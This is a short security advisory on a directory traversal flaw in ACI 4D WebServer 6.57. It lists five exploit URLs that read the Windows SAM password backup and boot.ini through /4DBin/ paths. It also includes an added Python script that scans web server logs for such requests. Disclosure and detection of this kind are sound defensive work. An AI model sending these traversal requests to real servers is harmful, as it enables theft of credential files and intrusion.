COMMAND

ACI 4D WebServer

SYSTEMS AFFECTED

ACI 4D WebServer 6.57 (at least)

PROBLEM

'KF' found the following. This directory traversal hole seems to work on ACI 4D WebServer running on the NT platform. One would imagine exploitation on a Mac OS box would be similar but would require the proper Mac filesystem path to the file you wish to view.

Exploit: http://host + one of the following URLs:

- /4DBin/_/C:/winnt/repair/sam._
- /4DBin/_/../winnt/repair/sam._
- /4DBin/_/C:/inetpub/../boot.ini
- /4DBin/_/../boot.ini
- /4DBin/_/../inetpub/../boot.ini

SOLUTION

Nothing yet.
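
With no fix available, the request pattern listed under PROBLEM can at least be looked for in web server logs. The following is an added example, not part of the original advisory: it flags requests under /4DBin/ whose path contains a parent-directory or drive-letter segment. It assumes access logs in Common Log Format; the function names and the sample log lines are constructed for illustration.

```python
import re
from urllib.parse import unquote

# Request field of a Common Log Format line: "METHOD target PROTOCOL"
REQUEST_RE = re.compile(r'"(?:GET|HEAD|POST) (\S+) HTTP/[\d.]+"')
DRIVE_RE = re.compile(r"^[a-z]:$")  # a whole path segment such as "c:"
PREFIX = "/4dbin/"                  # matched case-insensitively

def fully_decode(target, max_rounds=5):
    """Percent-decode until stable so nested encodings are normalized."""
    for _ in range(max_rounds):
        decoded = unquote(target)
        if decoded == target:
            break
        target = decoded
    return target

def classify(target):
    """Return why a request target is suspicious, or None if it is not."""
    path = fully_decode(target).split("?", 1)[0].replace("\\", "/").lower()
    if not path.startswith(PREFIX):
        return None
    segments = [s for s in path[len(PREFIX):].split("/") if s]
    if ".." in segments:
        return "parent-directory segment"
    if any(DRIVE_RE.match(s) for s in segments):
        return "drive-letter segment"
    return None

def scan(log_lines):
    """Return (client, target, reason) for each flagged request."""
    hits = []
    for line in log_lines:
        m = REQUEST_RE.search(line)
        reason = classify(m.group(1)) if m else None
        if reason:
            hits.append((line.split(" ", 1)[0], m.group(1), reason))
    return hits

# Constructed sample log lines; the first two targets are from the advisory.
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2001:10:00:00 +0000] "GET /4DBin/_/../boot.ini HTTP/1.0" 200 512',
    '192.0.2.11 - - [01/Jan/2001:10:00:05 +0000] "GET /4DBin/_/C:/winnt/repair/sam._ HTTP/1.0" 200 512',
    '192.0.2.12 - - [01/Jan/2001:10:00:12 +0000] "GET /4DBin/report.shtml HTTP/1.0" 200 2048',
    '192.0.2.13 - - [01/Jan/2001:10:00:15 +0000] "GET /index.html HTTP/1.0" 200 1024',
]
if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(*hit)
```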